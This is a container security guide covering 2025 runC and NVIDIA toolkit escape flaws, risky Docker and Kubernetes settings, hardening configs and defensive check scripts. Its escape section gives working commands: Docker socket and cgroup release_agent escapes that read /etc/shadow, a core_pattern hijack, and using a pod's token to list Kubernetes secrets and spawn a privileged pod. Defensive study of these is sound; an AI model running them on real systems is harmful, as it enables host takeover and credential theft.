critical | K8s Security | CWE-250 | CWE-269 | CWE-284

Container Security

Container security encompasses the protection of containerized applications from vulnerabilities that could allow attackers to escape isolation boundaries and compromise host systems. With the widespread adoption of Docker and Kubernetes, container escape vulnerabilities have become critical security concerns that can lead to complete infrastructure compromise.

What is Container Escape?

Container escape occurs when an attacker breaks out of the isolated container environment and gains access to the underlying host system. Containers are designed to provide process isolation, but vulnerabilities in the container runtime or kernel, as well as misconfigurations, can let attackers breach these boundaries and potentially compromise the entire infrastructure.

Critical runC Vulnerabilities (2025)

In November 2025, three severe vulnerabilities were disclosed in runC, the low-level container runtime that underlies Docker and most Kubernetes deployments. These flaws allow attackers to escape containers and gain root access to the host system:

CVE-2025-31133: Masked Path Abuse via /dev/null

This flaw arises from runC's use of /dev/null to mask sensitive host files. Because runC does not properly verify that the container's /dev/null is the genuine device, attackers can swap it with a symlink during initialization, allowing arbitrary host paths to be bind-mounted into the container.
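
As a rough illustration of the check that was missing, the sketch below tests whether a path is the genuine null device: not a symlink, a character device, and device numbers 1:3. The function name `is_genuine_dev_null` is made up for this example, it assumes a `stat` that supports `-c` (GNU coreutils or BusyBox), and it is not how the runC patch itself is implemented.

```shell
# Sketch: succeed only if the given path is a genuine Linux null device.
# Assumption: stat supports -c with %t/%T (hex major/minor numbers).
is_genuine_dev_null() {
    path=${1:-/dev/null}
    # Reject symlinks outright: the attack swaps /dev/null for a symlink.
    if [ -L "$path" ]; then
        return 1
    fi
    # The path must be a character device...
    if [ ! -c "$path" ]; then
        return 1
    fi
    # ...with major 1, minor 3, which is the Linux null device.
    [ "$(stat -c '%t:%T' "$path")" = "1:3" ]
}
```

Calling `is_genuine_dev_null /dev/null` inside a container should succeed on a normal setup; a failure would be worth investigating.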

CVE-2025-52565: /dev/console Race Condition

The /dev/console bind mount can be exploited through race conditions and symlinks. This manipulation allows runC to mount an unexpected target inside the container before security protections are in place, granting write access to critical procfs entries.

CVE-2025-52881: Shared Mount Race

This vulnerability abuses race conditions with shared mounts to redirect runC writes to /proc files. Attackers can manipulate dangerous system files such as /proc/sysrq-trigger, potentially crashing systems or enabling privilege escalation.

NVIDIAScape Vulnerability

CVE-2025-23266 (NVIDIAScape) showed that attackers can escape container isolation with minimal effort through the NVIDIA Container Toolkit. The vulnerability was reported to affect 37% of cloud environments using NVIDIA containers, and the attack requires only a three-line exploit that relies on LD_PRELOAD manipulation.
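
Because the attack hinges on an image setting LD_PRELOAD, one cheap screening step is to flag Dockerfiles that set it through ENV. The sketch below is a plain text match with a hypothetical function name (`dockerfile_sets_ld_preload`). It will not catch a variable inherited from a base image or injected at runtime, so treat it as a first filter only.

```shell
# Sketch: print (with line numbers) every ENV instruction that sets LD_PRELOAD.
# Returns 0 when at least one line is flagged, non-zero otherwise.
dockerfile_sets_ld_preload() {
    # Matches "ENV LD_PRELOAD=...", "ENV LD_PRELOAD ..." and
    # "ENV OTHER=x LD_PRELOAD=..."; the instruction name is case-insensitive.
    grep -n -E '^[[:space:]]*[Ee][Nn][Vv][[:space:]]+(.*[[:space:]])?LD_PRELOAD([=[:space:]]|$)' "$1"
}
```

A typical use is `dockerfile_sets_ld_preload ./Dockerfile && echo "review this image before running it"`.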

Vulnerable Dockerfile Patterns

dockerfile
# VULNERABLE: Running as root
FROM ubuntu:latest
RUN apt-get update && apt-get install -y app
# No USER directive - runs as root!
CMD ["./app"]

yaml
# VULNERABLE: Privileged mode in docker-compose
services:
  app:
    image: myapp
    privileged: true  # Full host access (already implies every capability)
    cap_add:
      - SYS_ADMIN     # Dangerous capability even without privileged mode

yaml
# VULNERABLE: Mounting Docker socket
services:
  app:
    image: myapp
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock  # Container escape vector!
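
The patterns above are easy to search for before deployment. The following sketch greps a Compose file or Kubernetes YAML manifest for a handful of risky settings. The function name `risky_container_settings` is hypothetical, and because this is a text match rather than a YAML parser, commented-out lines will also be reported.

```shell
# Sketch: list lines in a YAML file that enable well-known escape vectors.
# Returns 0 when at least one risky line is found, non-zero otherwise.
risky_container_settings() {
    grep -n -E 'privileged:[[:space:]]*true|docker\.sock|SYS_ADMIN|hostPID:[[:space:]]*true|hostNetwork:[[:space:]]*true' "$1"
}
```

For example, `risky_container_settings docker-compose.yml` prints each offending line with its line number so it can be reviewed.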

Container Escape Techniques

Docker Socket Escape

bash
# If Docker socket is mounted, escape is trivial
# From inside container:
docker run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh

# Or create a privileged container that mounts host root
docker run -v /:/host -it ubuntu chroot /host
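
From the defender's side, a quick way to see whether a running container is exposed to this technique is to look for runtime sockets among its mounts. The sketch below reads the mount point column (field 5) of `/proc/self/mountinfo`. The function name and the list of socket names are assumptions made for this example.

```shell
# Sketch: print mount points that look like container runtime sockets.
# Takes an optional mountinfo file (defaults to the current process's).
# Returns 0 if any are found, 1 otherwise.
mounted_runtime_sockets() {
    awk '$5 ~ /(docker|containerd|crio)\.sock$/ { print $5; found = 1 }
         END { exit !found }' "${1:-/proc/self/mountinfo}"
}
```

Running `mounted_runtime_sockets` inside a container that should have no access to the runtime is expected to print nothing.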

Procfs Escape via core_pattern

bash
# If /proc/sys/kernel/core_pattern is writable:
echo '|/path/to/malicious_script' > /proc/sys/kernel/core_pattern

# Trigger a core dump - script executes on host
kill -SIGSEGV $$
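
Whether this technique applies depends on the sensitive procfs entries being writable from inside the container. A minimal audit sketch, with a hypothetical function name, reports which of the given paths the current process can write to. It relies on the shell's `-w` test, which also fails for paths on read-only mounts.

```shell
# Sketch: report which of the given paths are writable by the current process.
# Returns 0 if at least one path is writable, 1 otherwise.
writable_sensitive_paths() {
    rc=1
    for p in "$@"; do
        if [ -w "$p" ]; then
            echo "writable: $p"
            rc=0
        fi
    done
    return "$rc"
}
```

A typical call is `writable_sensitive_paths /proc/sys/kernel/core_pattern /proc/sysrq-trigger`; in a properly confined container it should print nothing.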

Capability-Based Escape

bash
# Check dangerous capabilities
capsh --print

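# CAP_SYS_ADMIN allows mounting (cgroup v1 release_agent technique)
mount -t cgroup -o rdma cgroup /mnt
mkdir /mnt/x
echo 1 > /mnt/x/notify_on_release
# release_agent runs on the host, so it needs the host-side path to /cmd
# (assumes the overlay storage driver, which exposes upperdir in /etc/mtab)
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /mnt/release_agent
# printf emits a real newline; plain echo would write a literal \n
printf '#!/bin/sh\ncat /etc/shadow > %s/output\n' "$host_path" > /cmd
chmod +x /cmd
# The agent fires when the last process leaves the cgroup
sh -c "echo \$\$ > /mnt/x/cgroup.procs"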
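
When `capsh` is not installed in the image, the effective capability set can be read from the `CapEff` line of `/proc/<pid>/status` and decoded by hand. The sketch below tests a single bit of that hexadecimal mask; CAP_SYS_ADMIN is bit 21 in the Linux capability numbering. The function names are made up for this example.

```shell
# Sketch: has_cap MASK BIT succeeds if bit BIT is set in the hex mask MASK
# (MASK is the CapEff value without a leading 0x).
has_cap() {
    [ $(( 0x$1 >> $2 & 1 )) -eq 1 ]
}

# Print the effective capability mask of the current shell.
current_cap_eff() {
    awk '/^CapEff:/ { print $2 }' "/proc/$$/status"
}
```

For instance, `has_cap "$(current_cap_eff)" 21 && echo "CAP_SYS_ADMIN is present"` flags a container in which the mount-based technique above may be possible.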

Kubernetes-Specific Attacks

A common Kubernetes attack vector is API abuse, where attackers exploit exposed API endpoints, weak authentication, or misconfigured RBAC settings:

bash
# Check for exposed Kubernetes API
curl -k https://<k8s-api>:6443/api

# If service account token is accessible:
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -k -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default.svc/api/v1/namespaces/default/secrets

# Create privileged pod to escape
kubectl run pwned --image=ubuntu --restart=Never \
  --overrides='{"spec":{"hostPID":true,"hostNetwork":true,
  "containers":[{"name":"pwned","image":"ubuntu",
  "securityContext":{"privileged":true}}]}}'

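The token-based requests above only work when a service account token is mounted into the pod. A small sketch, using a hypothetical function name, checks for a readable, non-empty token at the default path used in the example. Workloads that never talk to the API server can usually avoid the mount by setting `automountServiceAccountToken: false` in the pod spec.

```shell
# Sketch: succeed if a readable, non-empty service account token exists.
# The directory argument is optional and defaults to the standard mount path.
sa_token_mounted() {
    dir=${1:-/var/run/secrets/kubernetes.io/serviceaccount}
    [ -r "$dir/token" ] && [ -s "$dir/token" ]
}
```

Inside a pod, `sa_token_mounted && echo "token present: review this pod's RBAC bindings"` gives a quick signal of exposure.
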
Prevention Strategies

Secure Dockerfile

dockerfile
# SECURE: Multi-stage build with non-root user
FROM golang:1.21 AS builder
WORKDIR /app
COPY . .
RUN CGO_ENABLED=0 go build -o app

FROM alpine:3.19
RUN adduser -D -u 10001 appuser
USER appuser
COPY --from=builder /app/app /app
# A read-only root filesystem is enforced at runtime (e.g. docker run --read-only), not in the Dockerfile
CMD ["/app"]
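
To verify that a Dockerfile actually ends up running as a non-root user, the last USER instruction of the final build stage can be extracted with a few lines of awk. This is a sketch with hypothetical function names. It assumes every stage starts as root unless it sets USER itself, which is not true for base images that already define a non-root user.

```shell
# Sketch: print the effective USER of the final build stage ("root" if unset).
dockerfile_final_user() {
    awk '
        toupper($1) == "FROM" { user = "root" }   # new stage: assume root again
        toupper($1) == "USER" { user = $2 }
        END { print (user == "" ? "root" : user) }
    ' "$1"
}

# Succeed if the final stage would run as root (by name or UID 0).
runs_as_root() {
    case $(dockerfile_final_user "$1") in
        root|0|root:*|0:*) return 0 ;;
        *) return 1 ;;
    esac
}
```

In a CI step, `runs_as_root Dockerfile && exit 1` would fail the build for images like the vulnerable example earlier.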

Kubernetes Security Context

yaml
apiVersion: v1
kind: Pod
metadata:
  name: secure-pod
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 10001
    fsGroup: 10001
    seccompProfile:
      type: RuntimeDefault
  containers:
  - name: app
    image: myapp:latest
    securityContext:
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop:
          - ALL

Pod Security Standards

yaml
# Enforce restricted pod security standard
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted

Security Checklist

• Update runC to version 1.2.8, 1.3.3, or 1.4.0-rc.3 or later

• Enable user namespaces for all containers so that root inside a container maps to an unprivileged user on the host

• Use rootless containers where possible to limit the impact of a runtime vulnerability

• Never mount Docker socket inside containers

• Drop all capabilities and add only what's needed

• Implement strict image scanning to detect malicious Dockerfiles

• Use read-only root filesystems for containers

• Apply Pod Security Standards in Kubernetes namespaces

• Monitor for suspicious mount configurations and escape attempts

• Implement network policies to restrict container-to-container communication
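
The first checklist item can be checked mechanically. The sketch below compares a runC version string against the fixed releases named above (1.2.8, 1.3.3, 1.4.0-rc.3). The function name is hypothetical, releases older than the 1.2 branch are treated as unpatched, and pre-release suffixes are only interpreted on the 1.4.0 line, so distribution builds with backported fixes may be misreported.

```shell
# Sketch: runc_is_patched VERSION
# Returns 0 if patched, 1 if unpatched, 2 if the version cannot be parsed.
runc_is_patched() {
    ver=${1#v}
    core=${ver%%-*}                           # "1.4.0" from "1.4.0-rc.3"
    pre=
    case $ver in *-*) pre=${ver#*-} ;; esac   # "rc.3"; empty for final releases
    core=${core%%+*}                          # drop build metadata such as "+dev"
    case $core in *.*.*) ;; *) return 2 ;; esac
    major=${core%%.*}
    rest=${core#*.}
    minor=${rest%%.*}
    patch=${rest#*.}
    case $major$minor$patch in ''|*[!0-9]*) return 2 ;; esac
    if [ "$major" -gt 1 ]; then return 0; fi  # assumption: later majors include the fixes
    if [ "$major" -lt 1 ]; then return 1; fi
    case $minor in
        0|1) return 1 ;;
        2) [ "$patch" -ge 8 ] ;;
        3) [ "$patch" -ge 3 ] ;;
        4)
            if [ "$patch" -gt 0 ] || [ -z "$pre" ]; then return 0; fi
            case $pre in
                rc.*) n=${pre#rc.}; n=${n%%[!0-9]*}; [ "${n:-0}" -ge 3 ] ;;
                *) return 1 ;;
            esac ;;
        *) return 0 ;;
    esac
}
```

Assuming the first line of `runc --version` reads `runc version X.Y.Z`, the check can be run as `runc_is_patched "$(runc --version | awk 'NR==1 { print $3 }')" || echo "runC needs updating"`.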
